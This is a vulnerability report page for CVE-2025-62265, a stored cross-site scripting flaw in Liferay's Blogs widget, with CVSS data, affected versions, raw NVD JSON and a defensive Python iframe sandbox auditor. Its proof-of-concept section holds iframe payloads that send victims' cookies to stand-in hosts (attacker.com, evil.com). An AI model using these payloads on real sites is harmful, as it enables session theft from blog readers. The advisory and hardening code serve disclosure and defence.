Security Vulnerability Report
CVE-2025-62265 CVSS 5.4 MEDIUM

CVE-2025-62265

Published: 2025-10-30 19:16:35
Last Modified: 2025-11-11 01:58:54

Description

Cross-site scripting (XSS) vulnerability in the Blogs widget in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, 7.3 GA through update 36, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted <iframe> injected into a blog entry's “Content” text field.

The Blogs widget in Liferay DXP does not add the sandbox attribute to <iframe> elements, which allows remote attackers to access the parent page via scripts and links in the frame page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

The NVD record also carries a secondary CVSS 4.0 assessment of 4.8 (MEDIUM), vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N, and classifies the weakness as CWE-79. Read the 3.1 vector as: the attacker needs an authenticated account that can author or edit a blog entry (PR:L), a victim must view that entry (UI:R), and the injected frame's script runs in the context of the page the victim is viewing rather than being confined to the Blogs widget (S:C).

Configurations (Affected Products)

cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:* - VULNERABLE
Liferay Portal 7.4.0 through 7.4.3.111
Liferay Portal older unsupported versions
Liferay DXP 2023.Q4.0 through 2023.Q4.10
Liferay DXP 2023.Q3.1 through 2023.Q3.8
Liferay DXP 7.4 GA through update 92
Liferay DXP 7.3 GA through update 36
Liferay DXP older unsupported versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-62265 PoC: stored XSS via an <iframe> that the Blogs widget renders without a sandbox attribute -->
<!-- Step 1: as a user who can author blog entries, insert one of the following payloads into the blog's "Content" text field -->

<!-- Payload A: a javascript: src. The script executes in the frame's initial about:blank document, which inherits the
     embedding page's origin, so document.cookie here is the parent page's (non-HttpOnly) cookie jar. -->
<iframe src="javascript:alert(document.cookie)" width="0" height="0" style="display:none"></iframe>

<!-- Payload B: a data: URL carrying an inline script. Caveat: a data: frame has an opaque origin, so the script runs
     but document.cookie inside it is empty; this variant demonstrates script execution, not parent-cookie access. -->
<iframe src="data:text/html,<script>fetch('https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie))</script>" sandbox="allow-scripts allow-same-origin"></iframe>

<!-- Step 2: when a victim views the blog entry, the frame loads and its script executes. -->
<!-- Because Liferay adds no sandbox attribute, the frame can reach the parent page context. -->
<!-- Example: exfiltrating the parent page's cookies via an image request, again from a javascript: src -->
<iframe src="javascript:(function(){var x=document.createElement('img');x.src='https://evil.com/log?c='+encodeURIComponent(document.cookie);document.body.appendChild(x)})()" style="visibility:hidden"></iframe>
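The flaw is a missing `sandbox` attribute on author-supplied `<iframe>` elements. The following is an added example, written for this report and not Liferay's code or the PoC above: a Python standard-library pass over stored blog HTML that (a) audits content for iframes rendered without a sandbox or with a sandbox that grants `allow-same-origin` or top-navigation tokens, and (b) rewrites the content so every iframe is forced to a fixed policy and `javascript:`/`data:` sources are dropped. The function names, the `allow-scripts` default policy and the sample blog content are assumptions; the advisory does not state which sandbox tokens Liferay's fix applies.

```python
"""Audit and harden blog HTML so every <iframe> carries a restrictive sandbox.

Added example for CVE-2025-62265, not Liferay's code. Standard library only;
runs offline on the constructed SAMPLE_BLOG_CONTENT below.
"""
from html import escape
from html.parser import HTMLParser

# Tokens that defeat the sandbox on attacker-controlled content: allow-same-origin
# lets the frame reach the parent (and, with allow-scripts, strip its own sandbox);
# the others let it navigate or escape the top-level page.
DANGEROUS_SANDBOX_TOKENS = {
    "allow-same-origin",
    "allow-top-navigation",
    "allow-top-navigation-by-user-activation",
    "allow-popups-to-escape-sandbox",
}
# Assumed policy for the hardened form (Liferay's actual token set is not on the page).
# allow-scripts alone keeps embeds working but gives the frame an opaque origin.
DEFAULT_SANDBOX = "allow-scripts"
# src schemes that are inline code rather than a remote document; dropped outright.
SCRIPT_SCHEMES = ("javascript:", "data:")


def _sandbox_problem(attrs):
    """Reason string if this iframe's attributes are unsafe, else None."""
    a = dict(attrs)  # html.parser already lower-cases attribute names
    if "sandbox" not in a:
        return "no sandbox attribute"
    bad = sorted(set((a["sandbox"] or "").split()) & DANGEROUS_SANDBOX_TOKENS)
    return f"sandbox grants {', '.join(bad)}" if bad else None


class _IframeAuditor(HTMLParser):
    """Collects every <iframe> missing a sandbox or granting a dangerous token."""

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            reason = _sandbox_problem(attrs)
            if reason:
                self.findings.append({"src": dict(attrs).get("src"), "reason": reason})

    handle_startendtag = handle_starttag


def find_unsafe_iframes(html):
    """Detection side: iframes in stored content that would render unsandboxed."""
    p = _IframeAuditor()
    p.feed(html)
    p.close()
    return p.findings


class _IframeHardener(HTMLParser):
    """Re-emits markup unchanged except that each <iframe> gets a fixed sandbox."""

    def __init__(self, sandbox):
        super().__init__(convert_charrefs=False)
        self.sandbox, self.out = sandbox, []

    def _hardened_iframe(self, attrs):
        kept = []
        for name, value in attrs:
            if name == "sandbox":
                continue  # never trust an author-supplied sandbox value
            if name == "src" and value and value.strip().lower().startswith(SCRIPT_SCHEMES):
                continue  # drop javascript:/data: sources entirely
            kept.append((name, value))
        kept.append(("sandbox", self.sandbox))
        rendered = "".join(f' {n}="{escape(v, quote=True)}"' if v is not None else f" {n}"
                           for n, v in kept)
        return f"<iframe{rendered}>"

    def handle_starttag(self, tag, attrs):
        self.out.append(self._hardened_iframe(attrs) if tag == "iframe" else self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):  # <br/> and friends are passed through verbatim
        self.out.append(self._hardened_iframe(attrs) + "</iframe>" if tag == "iframe"
                        else self.get_starttag_text())

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):  # keep &amp; etc. exactly as stored
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")


def enforce_iframe_sandbox(html, sandbox=DEFAULT_SANDBOX):
    """Hardening side: same content with every <iframe> forced to the given sandbox."""
    p = _IframeHardener(sandbox)
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed sample of a blog entry's "Content" field: a javascript: frame with no
# sandbox (the CVE), an author-supplied permissive sandbox, and an acceptable embed.
SAMPLE_BLOG_CONTENT = (
    "<p>Hello &amp; welcome</p>"
    '<iframe src="javascript:alert(document.cookie)" width="0" height="0"></iframe>'
    '<iframe src="https://video.example/embed/1" sandbox="allow-scripts allow-same-origin"></iframe>'
    '<iframe src="https://widget.example/w" sandbox="allow-scripts"></iframe>'
)
```

Running `find_unsafe_iframes(SAMPLE_BLOG_CONTENT)` reports the first two frames; `enforce_iframe_sandbox(SAMPLE_BLOG_CONTENT)` strips the `javascript:` source, replaces the author's `allow-same-origin` policy and leaves the rest of the markup byte-for-byte intact. Apply the hardening at save time and again at render time, since content stored before the fix is still in the database.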

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62265", "sourceIdentifier": "[email protected]", "published": "2025-10-30T19:16:35.490", "lastModified": "2025-11-11T01:58:54.070", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the Blogs widget in Liferay Portal 7.4.0 through 7.4.3.111, and older unsupported versions, and Liferay DXP 2023.Q4.0 through 2023.Q4.10, 2023.Q3.1 through 2023.Q3.8, 7.4 GA through update 92, 7.3 GA through update 36, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via a crafted <iframe> injected into a blog entry's “Content” text field \n\nThe Blogs widget in Liferay DXP does not add the sandbox attribute to <iframe> elements, which allows remote attackers to access the parent page via scripts and links in the frame page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:*:*:*:*:*:*:*:*", "versionEndIncluding": "7.4", "matchCriteriaId": "5F7BCC0B-5F36-4E6B-AABE-61B88E9A99D8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.1:*:*:*:*:*:*:*", "matchCriteriaId": "1EF6451A-2A5D-4222-A1C6-113AA4B8D4E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.2:*:*:*:*:*:*:*", "matchCriteriaId": "9D6CE430-3C95-4855-BA44-E2E136D1FEB2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.3:*:*:*:*:*:*:*", "matchCriteriaId": "44FEB149-C792-493D-B055-568FFC96298A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.4:*:*:*:*:*:*:*", "matchCriteriaId": "B050DD73-71B6-46CD-A35B-7ACB53BE6C6A"}, {"vulnerable": true, 
"criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.5:*:*:*:*:*:*:*", "matchCriteriaId": "62432289-E1DC-4013-85C7-6B77299A910F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.6:*:*:*:*:*:*:*", "matchCriteriaId": "0912EEFE-DC56-43F6-AE0E-A4E2A033F3C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.7:*:*:*:*:*:*:*", "matchCriteriaId": "9398F679-5F47-4DF2-AA91-4A21126675C6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q3.8:*:*:*:*:*:*:*", "matchCriteriaId": "8296B54A-976A-404C-AB77-0619E4297A69"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5CE3202-2723-44A6-B63F-061138287FDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:liferay:digital_experience_platform:2023.q4.1:*:*:*:*:*:*:*", "matchCriteriaId": "A27A8480-7EE1-4265-9117-D6C234ACAC5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lif ... (truncated)